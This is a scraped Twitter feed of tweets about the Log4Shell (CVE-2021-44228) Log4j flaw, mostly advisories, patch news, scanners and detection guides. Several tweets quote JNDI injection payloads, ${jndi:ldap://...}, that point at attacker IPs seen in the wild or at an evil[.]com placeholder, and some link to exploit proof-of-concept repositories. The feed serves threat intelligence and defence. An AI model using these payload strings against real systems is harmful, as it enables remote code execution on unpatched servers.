2021-12-19 20:10:44#Log4Shell sample vulnerable application (CVE-2021-44228) https://t.co/lqisDWOxzO #Pentesting #ciberseguridad https://github.com/christophetd/log4shell-vulnerable-appBTshell
2021-12-19 19:40:45Log4j (CVE-2021-44228) RCE Vulnerability Explained https://t.co/0aJdkzp65D via @YouTube https://youtu.be/0-abhd-CLwQschnoddelbotz
2021-12-19 19:30:14Workaround instructions to address CVE-2021-44228 and CVE-2021-45046 in vRealize Operations 8.x https://t.co/0YwSU9KiEt https://dy.si/KANA8scandaletti
2021-12-19 19:10:11@saschakaupp @Graf_Icker Offiziell seit 9.12. Bekannt Inside the log4j2 vulnerability (CVE-2021-44228) 12/10/2021 J… https://t.co/Pp2pDQQFzG https://twitter.com/i/web/status/1472644491165249540TrullLaLa
2021-12-19 19:07:534. CVE-2021-44228_scanner Scanners for Jar files that may be vulnerable to CVE-2021-44228 #PowerShell https://t.co/f2siDIqMPf https://github.com/CERTCC/CVE-2021-44228_scannerbot_for_devs
2021-12-19 19:00:54log4j-detector: detects vulnerable Log4J versions (CVE-2021-44228, CVE-2021-45046) on your file-system within any a… https://t.co/q4BfJzCo5a https://twitter.com/i/web/status/1472640584863170572d34dr4bbit
2021-12-19 19:00:53"Dealing with CVE-2021-44228 has shown the JNDI has significant security issues. While we have mitigated what we ar… https://t.co/Psb4joO6vG https://twitter.com/i/web/status/1472640680920899584petercoffee
2021-12-19 19:00:49log4j-detector: detects vulnerable Log4J versions (CVE-2021-44228, CVE-2021-45046) on your file-system within any a… https://t.co/ydPamDtKsw https://twitter.com/i/web/status/1472641470205087746beingsheerazali
2021-12-19 18:54:58log4j-detector: detects vulnerable Log4J versions (CVE-2021-44228, CVE-2021-45046) on your file-system within any a… https://t.co/u2qvhr3zPx https://twitter.com/i/web/status/1472640192246857728Dinosn
2021-12-19 18:40:23Hackers vs. Developers // CVE-2021-44228 Log4Shell https://t.co/tEiILni2I9 https://ift.tt/3q9rRA3FreakBizarro
2021-12-19 18:12:08📦 log4shell-rex ⭐ 165 (+58) 🗒 Shell PCRE RegEx matching Log4Shell CVE-2021-44228 IOC in your logs https://t.co/TeQL9Wf95G https://github.com/back2root/log4shell-rexgh_trending_
2021-12-19 18:02:01A few updates on CVE-2021-44228 (Log4J) - and resources at end: https://t.co/NkCK0ng3GK https://lnkd.in/gbNi2ejAanilsaid
2021-12-19 17:42:47Published in response to CVE-2021-44228, this playbook and its sub-playbooks can be used to investigate and respond… https://t.co/yuPnKejFvs https://twitter.com/i/web/status/1472620262185000962PhilippeDARLEY
2021-12-19 17:21:47Some of the products affected by #log4shell CVE-2021-44228, CVE-2021-45046 VMWARE Products: https://t.co/qjF5dxg7rL… https://t.co/j7d7azWffa https://vmware.com/security/advisories/VMSA-2021-0028.html https://twitter.com/i/web/status/14726155203064422560xMohamedhasan
2021-12-19 17:20:42Additional step for vCenter Server CVE-2021-44228 and CVE-2021-45046 workaround. https://t.co/0fgidRNuTi https://dy.si/RMjwZscandaletti
2021-12-19 17:11:07Log4j Sec Vulnerabilities CVE-2021-44228 – Mitigation Strategies for TAS Ops https://t.co/TEk6aBN7J2 https://dy.si/3rasUJfverdugo_vmware
2021-12-19 17:00:28#log4j #vulnerability (#log4shell / #CVE-2021-44228) --&gt; #PATCH everything (exposed or not) vs ...#threatactor… https://t.co/PMTMzAhOuf https://twitter.com/i/web/status/1472610854491373568tribal_sec
2021-12-19 16:50:19CVE-2021-44228: Log4j2 Exploitability and Attack Path Mitigation https://t.co/5aRSxGr80U #cloudsecurity #itsecurity #secops #infosec http://feeds.dzone.com/link/16357/14962765/cve-2021-44228-log4j2-exploitability-amp-attack-pashanebrighton
2021-12-19 16:40:26CVE-2021-44228: Log4j2 Exploitability and Attack Path Mitigation https://t.co/0SE7dxDIlf https://www.itsecuritynews.info/cve-2021-44228-log4j2-exploitability-and-attack-path-mitigation/IT_securitynews
2021-12-19 16:01:04https://t.co/QKQAQZmIFU Apache Log4j CVE-2021-44228 (Log4Shell) の 影響有無リスト 2021.12.15 公開 2021.12.17 更新 https://www.softek.co.jp/SID/blog/archive/entry/20211215.htmlzimei_no_ri
2021-12-19 15:54:34Additional step for vCenter Server CVE-2021-44228 and CVE-2021-45046 workaround. https://t.co/hRqEOe2mvG https://dy.si/uqpkmdsimelka
2021-12-19 15:54:15Apache Log4j 2 CVE-2021-44228 https://t.co/T3NA11YFV4 https://www.docker.com/blog/apache-log4j-2-cve-2021-44228/zimei_no_ri
2021-12-19 15:51:45My condolence for anyone who got attack by this critical CVE-2021-44228. but this maybe become our starting point… https://t.co/TUo6R8zRAC https://twitter.com/i/web/status/1472594105733578756VeirryA
2021-12-19 15:41:51https://t.co/4GJ5Upsiu9 Apache Log4j の脆弱性 (CVE-2021-44228) の影響について 変更履歴 2021年 12月13日 初版作成 https://www.miraclelinux.com/support/log4jzimei_no_ri
2021-12-19 15:24:54Continuing to Stay Ahead of CVE-2021-44228: Addressing Your Top Questions  #cybersecurity #feedly… https://t.co/i9gpmj2h0z https://twitter.com/i/web/status/1472585022611853319winklhawk
2021-12-19 15:02:32Log4j vulnerabilities replicate like COVID strains: - Dec 12th - CVE-2021-44228 - fixed in Log4j 2.15.0 - Dec 14th… https://t.co/s6XXgyDap6 https://twitter.com/i/web/status/1472580639618654208p1f
2021-12-19 14:30:55Apache Log4jの任意のコード実行の脆弱性(Log4Shell: CVE-2021-44228, CVE-2021-4104, CVE-2021-45046 )とSELinux https://t.co/ZeZVUzVpjs https://security.sios.com/security/apache-log4j-selinux-poc-20211219.htmlmatsuu_zatsu
2021-12-19 14:11:25ここ最近のlog4j2のCVSS Score; - CVE-2021-44228: 10.0 - CVE-2021-45046: 9.0 - CVE-2021-45105: 7.5 Java8にして、2.17.0にして年越しましょう、とうことでFAnoguchis
2021-12-19 13:22:25Flashpoint analysts identified a thread on the top-tier Russian-language hacking forum XSS (CVE-2021-44228 Apache l… https://t.co/4wilJrMViM https://twitter.com/i/web/status/1472555938649460741780thC
2021-12-19 13:21:01The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/X3vHE1IzJ9 https://twitter.com/i/web/status/1472557182210220038RTocaxelli
2021-12-19 12:13:13Security Bulletin: Apache Log4j Vulnerability Affects IBM Sterling Connect:Direct Web Services (CVE-2021-44228) https://t.co/ecEU46l8PR https://buff.ly/3miZZblc4dw1z4rd
2021-12-19 11:51:44Ohhh CVE-2021-44228 is completely dangerous. bayangin pas lagi main minecraft, tbtb kebuka chrome.exe sendiri.oggiesutrisna
2021-12-19 11:50:40Security Bulletin: Vulnerability in Apache Log4j affects IBM Spectrum Protect Snapshot for VMware (CVE-2021-44228) https://t.co/7iVRXzATm2 https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-log4j-affects-ibm-spectrum-protect-snapshot-for-vmware-cve-2021-44228-2/ShahriyarGourgi
2021-12-19 11:50:21🚨 NEW: CVE-2021-45046 🚨 It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete i… https://t.co/D2BM7UGmiq https://twitter.com/i/web/status/1472534564203646984threatintelctr
2021-12-19 11:40:20久しぶりに書きました✍️ Apache Log4j問題をネットワーク観点で対策する(CVE-2021-44228) - ネットワークエンジニアのアレ https://t.co/v2AzM9ejv8 https://naitwo2.hateblo.jp/entry/Log4jnaitwo2
2021-12-19 11:30:34“Log4Shell (CVE-2021-44228, CVE-2021-45046)” (1 user) https://t.co/pip0mQxS0q https://htn.to/3CjyrSNuvwnamachan10777
2021-12-19 11:30:26CVE-2021-44228(いわゆるlog4j)ってpostfixとdovecotに影響を与えるのでしょうか…誰かご存知の方情報提供お願いします…おそらく総当たりだと思いますが一応確認したいです…rath_void
2021-12-19 11:20:23Hackers vs. Developers // CVE-2021-44228 Log4Shell https://t.co/eExwRP2ixT via @YouTube https://youtu.be/w2F67LbEtnkptantiku
2021-12-19 11:20:09まとめると、こんな感じかな。 CVE-2021-44228は12/15にでたバージョンで対応可能。 CVE-2021-45046は12/15のでたバージョンでは対応できないのでKBに従って対応。(バージョンアップされることを期待)… https://t.co/C6jEylqMmU https://twitter.com/i/web/status/1472526458472263684nohoyan
2021-12-19 11:13:51"#Log4j affects some features of IBM Db2 | Check Db2 federation| IBM released FIXes (CVE-2021-44228)" Check out my… https://t.co/qsInrZu8We https://twitter.com/i/web/status/1472523830266458114ImJhaChandan
2021-12-19 11:08:22rubo77/log4j_checker_beta: a fast check, if your server could be vulnerable to CVE-2021-44228… https://t.co/iNLYt6phCc https://twitter.com/i/web/status/1472519808902217731icoleis
2021-12-19 11:07:58Log4j (CVE-2021-44228) 최신 보안패치 다운로드 (21.12.17 일자) 2.17.0 버전 다운로드 https://t.co/NHzSKaSzJA http://naver.me/5Mwop1cEvirusmyths
2021-12-19 11:05:39fullhunt/log4j-scan: A fully automated, accurate, and extensive scanner for finding log4j RCE CVE-2021-44228… https://t.co/tWwJML7Crf https://twitter.com/i/web/status/1472520380371906562icoleis
2021-12-19 11:02:52Guide: How To Detect and Mitigate the Log4Shell Vulnerability (CVE-2021-44228 &amp; CVE-2021-45046) | LunaSec… https://t.co/Pj4GDyJYm3 https://twitter.com/i/web/status/1472520654880661511icoleis
2021-12-19 11:00:25UPDATE: VxRail Manager workaround to remediate Log4Shell (CVE-2021-44228/CVE-2021-45046/CVE-2021-4104) vulnerabilit… https://t.co/5ymjYtI9vz https://twitter.com/i/web/status/1472521900337377280VRMware
2021-12-19 10:50:21CVE-2021-45105で公式でてた。影響なし。月曜日から聞かれても助かるわ~。CVE-2021-44228とCVE-2021-45046用のKBはlog4jの2.16.0用に書き換わってるから注意! we have dete… https://t.co/H1Y404Jb6O https://twitter.com/i/web/status/1472519580480577536nohoyan
2021-12-19 10:30:46Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation - Microsoft Security Blog V… https://t.co/L8aQrrkaDX https://twitter.com/i/web/status/1472513312738926600argevise
2021-12-19 10:11:21log4j-shell-poc - A Proof-Of-Concept for the recently found CVE-2021-44228 vulnerability. https://t.co/YSEiRn1YDU http://github.com/kozmer/log4j-shell-pocpythontrending
2021-12-19 10:01:05A new #attackerkb assesment on 'CVE-2021-44228 (Log4Shell)' has been created by nu11secur1ty. Attacker Value: 5 | E… https://t.co/2AAscXInLH https://twitter.com/i/web/status/1472505154150797322Attackerkb_Bot
2021-12-19 09:51:42Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation #Cybersecurity… https://t.co/GLFCeBAGer https://twitter.com/i/web/status/1472504065712132101KbWorks
2021-12-19 09:43:39Une faille critique (CVE-2021-44228) d’exécution de code arbitraire à distance (RCE) dans Apache Log4j constitue un… https://t.co/lnqstJDjrI https://twitter.com/i/web/status/1472499466909327361PhilippeDARLEY
2021-12-19 09:00:46Luka Log4Shell (CVE-2021-44228) i trzecia dawka szczepionki przeciwko Covid-19 to nie jest dobra kombinacja. Zdecyd… https://t.co/5w3t2GDOPQ https://twitter.com/i/web/status/1472489920728076290Ziaro6
2021-12-19 08:50:46Qualys is giving its WAS app, which scans web apps and APIs for the Log4Shell (CVE-2021-44228) vulnerability… https://t.co/R617VBiADu https://twitter.com/i/web/status/1472487534001201155techxmediauae
2021-12-19 08:30:35The third recent vulnerability in Log4j: https://t.co/mX9hwX36lf Timeline: December 10, CVE-2021-44228… https://t.co/8Mbb9uWp8b https://logging.apache.org/log4j/2.x/security.html https://twitter.com/i/web/status/1472481555843108869apple_rom
2021-12-19 08:30:27“Log4jの深刻な脆弱性CVE-2021-44228についてまとめてみた - piyolog” https://t.co/LUTsYQDm7I https://htn.to/224ia3h7Eudealforest
2021-12-19 08:15:13Published in response to CVE-2021-44228, this playbook and its sub-playbooks can be used to investigate and respond… https://t.co/eYWpKvyO87 https://twitter.com/i/web/status/1472478563118968836MickApMick
2021-12-19 07:15:31CVE-2021-44228 https://t.co/NLm0RVgchG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2021-12-19 07:11:11Investigating CVE-2021-44228 Log4Shell Vulnerability https://t.co/chzVSJzevg https://dy.si/xdyC2satyashr
2021-12-19 07:02:13#log4j - CVE-2021-44228 (CVSS score: 10.0) - CVE-2021-45046 (CVSS score: 9.0) - CVE-2021-45105 (CVSS score: 7.5)… https://t.co/HXJvNRnp2I https://twitter.com/i/web/status/1472460089340530688cyberg0100
2021-12-19 06:30:46とりあえずメモ。 Apache Log4jの任意のコード実行の脆弱性(CVE-2021-44228)に関する注意喚起 https://t.co/TTyTRYmdVD https://www.jpcert.or.jp/at/2021/at210050.htmlsbra_beta1
2021-12-19 06:00:22Log4jの深刻な脆弱性CVE-2021-44228についてまとめてみた - piyolog https://t.co/05dVHLbGVe https://piyolog.hatenadiary.jp/entry/2021/12/13/045541Nafty1115
2021-12-19 05:25:11- "안랩이 Apache Log4j 취약점인 ‘CVE-2021-44228’의 영향을 받는 log4j Core를 공개하며 보안 업데이트를 권고했다" (2021.12.17 보안뉴스)… https://t.co/Bg4iMw6D53 https://twitter.com/i/web/status/1472435959279284228agit00
2021-12-19 04:44:10GitHub Trending Archive, 17 Dec 2021, Java. logpresso/CVE-2021-44228-Scanner, kozmer/log4j-shell-poc, 648540858/wvp… https://t.co/cf2CICCnGQ https://twitter.com/i/web/status/1472423991302586370motakasoft
2021-12-19 04:31:28Microsoft’s Response to CVE-2021-44228 Apache Log4j 2 – Microsoft Security Response Center #msftadvocate https://t.co/8OhTT5gpaX https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/TracyKinsey
2021-12-19 04:23:34Mitigating the log4j Vulnerability (CVE-2021-44228) with NGINX https://t.co/769S4XHx51 https://www.nginx.com/blog/mitigating-the-log4j-vulnerability-cve-2021-44228-with-nginx/matsuu_zatsu
2021-12-19 04:00:17"Announcement Pandora FMS CVE-2021-44228: The critical Apache Log4j vulnerability" https://t.co/EhDYxeEb9z Via @PandoraFMS. https://pandorafms.com/blog/cve-2021-44228/ks7000
2021-12-19 03:52:32Security Bulletin: Vulnerability in Apache Log4j affects some features of IBM #Db2 (CVE-2021-44228) https://t.co/WgKovidzPr https://www.ibm.com/support/pages/node/6526462?myns=swgimgmt&mynp=OCSSEPGG&mync=E&cm_sp=swgimgmt-_-OCSSEPGG-_-Ecraigmullins
2021-12-19 03:50:45Support Spotlight: CVE-2021-44228 for log4j and what it means for SAP Business One https://t.co/n8GaGNOU2D http://dlvr.it/SFfGP7blackbox_europe
2021-12-19 03:40:59IoT Botnet Exploiting #CVE-2021-44228 #log4j User-Agent: ${jndi:ldap://179.43.175.101:1389/o=tomcat} The payload… https://t.co/o08foM7JYc https://twitter.com/i/web/status/1472410098471477253tolisec
2021-12-19 03:32:37I spoke too soon, as usual @cyb3rops has the best write up on #log4j CVE-2021-44228 exploit detection https://t.co/MVFZeD2Nvi https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860bJulznova
2021-12-19 03:21:36Has to be best write up on exploit strings, obfuscation and evasion techniques I've read for #log4j CVE-2021-44228 https://t.co/XZEKsYNpNu https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-wordsJulznova
2021-12-19 03:11:32Log4jの脆弱性に対するGitHubの対応: CVE-2021-44228 https://t.co/ROcFI9h4tJ https://github.blog/jp/2021-12-14-githubs-response-to-log4j-vulnerability-cve-2021-44228/AmiSuzuki555
2021-12-19 03:10:28Has to be best write up on exploit strings, obfuscation and evasion techniques I've read for #log4j CVE-2021-44228… https://t.co/dsXiymWbIH https://twitter.com/i/web/status/1472402978220826629Julznova
2021-12-19 02:40:58_φ(・_・ Apache Log4jに存在する RCE 脆弱性(CVE-2021-44228)についての検証レポート | NTTデータ先端技術株式会社 https://t.co/VCx68laQEd https://www.intellilink.co.jp/column/vulner/2021/121500.aspxrhymeMK
2021-12-19 02:13:06【図解】Log4jの脆弱性 CVE-2021-44228 (Log4shell or LogJam) について | SEの道標 https://t.co/BST0LHDoaw https://milestone-of-se.nesuke.com/sv-advanced/sv-security/cve-2021-44228-log4shell-logjam/nobusue
2021-12-19 01:41:38GitHub Trending Archive, 17 Dec 2021, Unknown. rwincey/CVE-2021-44228-Log4j-Payloads, andysterks/three-levels-of-pr… https://t.co/WNsUPQ9pBs https://twitter.com/i/web/status/1472378669058641921motakasoft
2021-12-19 01:30:41Walking through investigating a log4j (CVE-2021-44228) malware attack https://t.co/iopSZf2Arr https://www.youtube.com/watch?v=49BLeUy3DL8MalwareTechBlog
2021-12-19 01:11:08"Cloudera Response to CVE-2021-44228" https://t.co/xwnEArQ6kw #machinelearning # how cloudera response for #log4j_leak https://blog.cloudera.com/cloudera-response-to-cve-2021-44228/Evan_Lin
2021-12-19 01:10:29Investigating CVE-2021-44228 Log4Shell Vulnerability https://t.co/KNo3MMoBuV https://dy.si/1hbduqSarge_Siddiqui
2021-12-19 00:40:56GitHub Trending Archive, 17 Dec 2021, All. logpresso/CVE-2021-44228-Scanner, kozmer/log4j-shell-poc, ChendoChap/pOO… https://t.co/WtI1Tle6em https://twitter.com/i/web/status/1472363591911505925motakasoft
2021-12-19 00:00:31#Log4Shell (#CVE-2021-44228) C2 server target Linux and Windows🔥 Fileless #CoinMiner Exec via PowerShell script ⛏… https://t.co/pVkWEvMs9R https://twitter.com/i/web/status/1472354457920974852Max_Mal_
2021-12-18 23:50:37CVE-2021-44228 log4j Ref: https://t.co/iigLDKOqpH https://t.co/yYxmv5CdPC https://threatfox.abuse.ch/ioc/277655/r3dbU7z
2021-12-18 23:50:04🚨 NEW: CVE-2021-45046 🚨 It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete i… https://t.co/qh7c2xE1MF https://twitter.com/i/web/status/1472353371159990273threatintelctr
2021-12-18 23:30:32VMware Site Recovery Manager is getting patch resolve CVE-2021-44228 and CVE-2021-45046. https://t.co/IOnoL6X408… https://t.co/YjjeDWmC9F https://angrysysops.com/2021/12/19/vmware-site-recovery-manager-is-getting-patch-resolve-cve-2021-44228-and-cve-2021-45046/ https://twitter.com/i/web/status/1472347236701028356AngrySysOps
2021-12-18 23:20:29GitHub - thomaspatzke/Log4Pot: A honeypot for the Log4Shell vulnerability (CVE-2021-44228). https://t.co/3bayt4P1YP https://github.com/thomaspatzke/Log4Potrobertux_
2021-12-18 22:40:16Citrix Security Advisory for Apache CVE-2021-44228, CVE-2021-45046 and CVE-2021-45105 | https://t.co/A6eXrAWP9a https://support.citrix.com/article/CTX335705ThomasPreischl
2021-12-18 22:40:12SIOSセキュリティブログを更新しました。 Apache Log4jの任意のコード実行の脆弱性(Log4Shell: CVE-2021-44228, CVE-2021-4104, CVE-2021-45046 )とSELinux… https://t.co/txCKQy0BHG https://twitter.com/i/web/status/1472334715772620801omokazuki
2021-12-18 22:20:15getting a tattoo on my hairline of CVE-2021-44228NEVERLOGGINGOUT
2021-12-18 22:20:09Apache Log4jに存在する RCE 脆弱性(CVE-2021-44228)についての検証レポート | NTTデータ先端技術株式会社 https://t.co/dEaoYkfk7X https://www.intellilink.co.jp/column/vulner/2021/121500.aspxGenkgGorosuke
2021-12-18 22:10:13GitHub - christophetd/log4shell-vulnerable-app: Spring Boot web application vulnerable to CVE-2021-44228, nicknamed… https://t.co/bOA3NRTlRt https://twitter.com/i/web/status/1472328014327394307Securityblog
2021-12-18 22:10:07GitHub - jas502n/Log4j2-CVE-2021-44228: Remote Code Injection In Log4j https://t.co/TxkfC4PThD https://github.com/jas502n/Log4j2-CVE-2021-44228Securityblog
2021-12-18 22:00:31Suggested Read: Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation https://t.co/eyDkab5P9U https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/ChrisShort
2021-12-18 21:40:18CVE-2021-44228: Remote code execution Versions from 2.14.0 and blow 2.15.0 fixes itnft_sec
2021-12-18 21:30:21scan for #Log4Shell (CVE-2021-44228) using #Burp Suite Professional or Enterprise Log4Shell #Scanner from the BApp… https://t.co/3t3rYEDC5w https://twitter.com/i/web/status/1472315785989308423AArabojr
2021-12-18 21:30:11So scrubbing your external-facing systems for CVE-2021-44228 et al is 𝘯𝘦𝘤𝘦𝘴𝘴𝘢𝘳𝘺 to reduce attack surface but is not… https://t.co/CX4UUvwa0Y https://twitter.com/i/web/status/1472317102753079297jfslowik
2021-12-18 21:00:19How to tell if your Gradle or Maven applications use a Log4j version effected by CVE-2021-44228 and/or CVE-2021-450… https://t.co/WGvNp7L91o https://twitter.com/i/web/status/1472309321501450241jhochwald
2021-12-18 21:00:14Scan with PowerShell for CVE-2021-44228 and/or CVE-2021-45046 effected versions of Log4j with support for JAR archi… https://t.co/gTnmMOzaz2 https://twitter.com/i/web/status/1472309446898593795jhochwald
2021-12-18 20:50:04How to Mitigate CVE-2021-44228 To mitigate the following options are available (see the advisory from Apache here)… https://t.co/Bv8B6IqWZF https://twitter.com/i/web/status/1472308051755556866AlirezaGhahrood
2021-12-18 20:40:15CVE-2021-44228のKennaリスクスコアは現在100点満点中87点であり、「この脆弱性の重大度と潜在的な影響を反映した非常にまれなスコアです」 「Log4Jの脆弱性はどの程度危険ですか?」 https://t.co/W3nxBuRDDt https://www.darkreading.com/edge-threat-monitor/how-risky-is-the-log4j-vulnerability-foxbook
2021-12-18 20:20:08Tech Solvency: The Story So Far: CVE-2021-44228 (Log4Shell log4j vulnerability). #cyber #cybersecuirty #risk… https://t.co/J91jHGlCaQ https://twitter.com/i/web/status/1472299411178807299TheBeauOliver
2021-12-18 20:10:31The current list of #vulnerabilities and recommended fixes are listed here; CVE-2021-44228 aka #Log4Shell - RCE CV… https://t.co/T58wpgJe06 https://twitter.com/i/web/status/1472296459190120455cyberplural
2021-12-18 20:00:22Additional step for vCenter Server CVE-2021-44228 and CVE-2021-45046 workaround. https://t.co/M0hIGaYtz9 https://dy.si/X8iF4m2fverdugo_vmware
2021-12-18 20:00:19Workaround instructions to address CVE-2021-44228 and CVE-2021-45046 in vRealize Operations 8.x https://t.co/osntmDK3Jg https://dy.si/Tirxhfverdugo_vmware
2021-12-18 20:00:17Arreglaron el bug de #log4j (CVE-2021-44228, criticidad 10), e introdujeron otro (CVE-2021-45046, criticidad 9). Ar… https://t.co/yfIfn8J1sB https://twitter.com/i/web/status/1472293868280467457mis2centavos
2021-12-18 19:30:18Example CVE-2021-44228 payload: ${jndi:ldap://5.101.118.127:1389/Exploit} (🇪🇪) Source IP: 36.138.125.117 (🇨🇳) https://t.co/d83ytnLFZZbad_packets
2021-12-18 19:20:23CVE-2021-44228, CVE-2021-45046, CVE-2021-4104: Frequently Asked Questions About Log4Shell and Associated Vulnerabil… https://t.co/eS0UuYrM4C https://twitter.com/i/web/status/1472283163015598082Art_Capella
2021-12-18 19:20:13This version contains security fixes for two remote code execution vulnerabilities, fixed in 2.15.0 (CVE-2021-44228… https://t.co/Gvv6c1Y40l https://twitter.com/i/web/status/1472284319519424516snyksec
2021-12-18 19:20:04#zookeeper: "Re: Impact of Log4J security vulnerability CVE-2021-44228 on zookeeper" https://t.co/JxPif5uW6h https://ift.tt/3yDiV9VApacheZooKeeper
2021-12-18 18:50:19The Log4Shell/ Log4j Vulnerability (CVE-2021-44228) Explained https://t.co/Jv0u2Y9Vz8 https://t.co/Sz8PzcItnh https://bit.ly/323Rf2aMissSheriL
2021-12-18 18:10:39Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation https://t.co/CoRhNNGHw6 https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/seoscottsdale
2021-12-18 18:10:36My assessment of log4j CVEs in general log4j usage. CVE-2021-44228: RCE CVE-2021-45046: local privilege escalation… https://t.co/iTZsLNwCGV https://twitter.com/i/web/status/1472266824599236611nahi
2021-12-18 18:00:18Log4j (CVE-2021-44228) RCE Vulnerability Explained https://t.co/b6owGXrSgp via @YouTube https://youtu.be/0-abhd-CLwQthe_gopz
2021-12-18 17:41:56Axio’s statement on the Log4J vulnerability (CVE-2021-44228) https://t.co/XOIpsD4Adi https://securityboulevard.com/2021/12/axios-statement-on-the-log4j-vulnerability-cve-2021-44228/InfoSecUSA
2021-12-18 17:21:44Hot topic right now so invest a little time to catch our DC Connects show from this week, Log4j CVE-2021-44228 Vuln… https://t.co/FKLPgkShYe https://twitter.com/i/web/status/1472252838545928197devcentral
2021-12-18 17:20:42📢 #Log4j Vulns ~ 1) CVE-2021-44228 (RCE) - Critical Payload: ${jndi:ldap://evil[.]com:1389/a} 2) CVE-2021-45046 (… https://t.co/HBK0IWqAhw https://twitter.com/i/web/status/14722547035012587561ZRR4H
2021-12-18 16:50:43???「CVE-2021-44228がやられたか」 ???「やつは四天王の中でも最弱・・・」 ???「次は俺に行かせてください」 ???「お前は・・・」 CVE-2021-4104「そう簡単にはやられませんよ」 ???「待て、CV… https://t.co/OZXjGnCivG https://twitter.com/i/web/status/1472246773909712897takatsudo
2021-12-18 16:50:13Apache Log4j2 CVE-2021-44228 node agent is an open source project built by the Kubernetes team at AWS. #Kubernetes… https://t.co/qUualfUJIM https://twitter.com/i/web/status/1472247612069793793TBeijen
2021-12-18 16:50:07Bollettino sicurezza VMWARE Diversi prodotti interessati dalle vulnerabilità #Log4shell CVE-2021-44228 CVE-2021-450… https://t.co/OS9R7hBEvM https://twitter.com/i/web/status/1472247626087243781Slvlombardo
2021-12-18 16:41:00Citrix Security Advisory for Apache CVE-2021-44228 and CVE-2021-45046 | https://t.co/A6eXrAFdKA https://support.citrix.com/article/CTX335705ThomasPreischl
2021-12-18 16:40:31The Apache Log4j2 CVE-2021-44228 node agent is designed to run as a DaemonSet and mitigate the impact of Log4j2 CVE… https://t.co/XVU3koNm8c https://twitter.com/i/web/status/1472244624882348035randradas
2021-12-18 16:32:04Keeping up with log4shell aka CVE-2021-44228 #Cybersecurity #security via https://t.co/s7n0wYZc3s https://t.co/tsY2FihcfV http://twinybots.ch https://cloudsecurityalliance.org/blog/2021/12/16/keeping-up-with-log4shell-aka-cve-2021-44228-aka-the-log4j-version-2/SalomonOli
2021-12-18 16:11:37Over the past week, we've analyzed CVE-2021-44228 exploit attempts. What we've learned: 1⃣ 84,000 sites were targe… https://t.co/AmYRRlHajB https://twitter.com/i/web/status/1472235231579095054Imperva
2021-12-18 16:11:35Madre mia pollito, la que se está liando. El log4j sigue 😂 Recapitulemos de nuevo: * CVE-2021-44228 - gravedad 10… https://t.co/M7sIN4JTR2 https://twitter.com/i/web/status/1472235242941562887devruso
2021-12-18 16:10:10Log4j CVE-2021-44228 https://t.co/kYFHHVhiqjsahilwep
2021-12-18 15:50:36В начале декабря 2021 года мир ИТ взволновала новость о критической уязвимости CVE-2021-44228 в библиотеке Apache L… https://t.co/3BMnBo2Pyv https://twitter.com/i/web/status/1472231587303817218BigdataschoolR
2021-12-18 15:30:43Suggested Read: Understanding Log4Shell via Exploitation and Live Patching (CVE-2021-44228 + CVE-2021-45046) | Luna… https://t.co/a29rCqwNzK https://twitter.com/i/web/status/1472226901964070913ChrisShort
2021-12-18 15:30:24#EU #CERT releases advisory 2021-075 on #CVE-2021-44228 and CVE-2021-45046 in #Apache #Log4j affecting #VMWare products.InakMali
2021-12-18 15:10:35CVE-2021-44228 https://t.co/NLm0RVgchG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2021-12-18 15:10:19#Log4j - The fourth in the series ℹ️ CVE-2021-44228 - CVSS score: 10.0 ℹ️ CVE-2021-45046 - CVSS score: 9.0 ℹ️ CVE… https://t.co/cKEBMBK5im https://twitter.com/i/web/status/1472221439780696073mis_config
2021-12-18 15:10:16Weekly Summary on AWS (December 12-18) Log4j2 CVE-2021-44228 related updates: ▪️ WAF ▪️ IoT Greengrass Core ▪️ IoT… https://t.co/uksEzQ3rwE https://twitter.com/i/web/status/1472221885169557518apple_rom
2021-12-18 15:00:22log4j log4shell Upgrade to version 2.17.0 CVE-2021-44228(CVSS score: 10.0),CVE-2021-45046(CVSS score: 9.0),CVE-2021… https://t.co/hTgY604F6x https://twitter.com/i/web/status/1472218323337494532ohhara_shiojiri
2021-12-18 14:31:06#Log4Shell #log4j CVE-2021-44228 If your org was impacted by the Log4j vulns please consider supporting the small… https://t.co/l6l1VMjNnM https://twitter.com/i/web/status/1472210061288255496TomSellers
2021-12-18 14:31:00Within the last 10 days, four of the following log4j vulnerabilities have been reported: ✅ CVE-2021-44228 (CVSS sc… https://t.co/1igOjUrvVS https://twitter.com/i/web/status/1472210531956056066Prajapa31497516
2021-12-18 14:20:22Within the last 10 days, four of the following log4j vulnerabilities have been reported: ✅ CVE-2021-44228 (CVSS sc… https://t.co/1HOfdzxmPC https://twitter.com/i/web/status/1472209602389295109TheHackersNews
2021-12-18 14:20:20年末進行が CVE-2021-44228 が 遠ざかる… プロマネ? 誰それ 顔も思い出せん https://t.co/YGLNoyGlPcsoonraah
2021-12-18 14:11:29Top 3 trending CVEs on Twitter Past 24 hrs: CVE-2021-44228: 3.8M (audience size) CVE-2021-45046: 2.8M CVE-2021-451… https://t.co/VjYjpsP4tj https://twitter.com/i/web/status/1472205014370238470CVEtrends
2021-12-18 14:10:22Log4jの脆弱性、最初に見つかったCVE-2021-44228に加え、CVE-2021-45046 / CVE-2021-45105 が見つかっていて、対応バージョンが2.15.0→2.16.0→2.17.0と上がってるのね。メンテナーも利用者もお疲れ様です。abe_masanori
2021-12-18 14:00:39Focus on mitigating CVE-2021-44228 by getting to 2.12.2 or 2.16.0. Doing that not only starts with the serious issu… https://t.co/CN5mMo8CA7 https://twitter.com/i/web/status/1472202634220220421nluedtke1
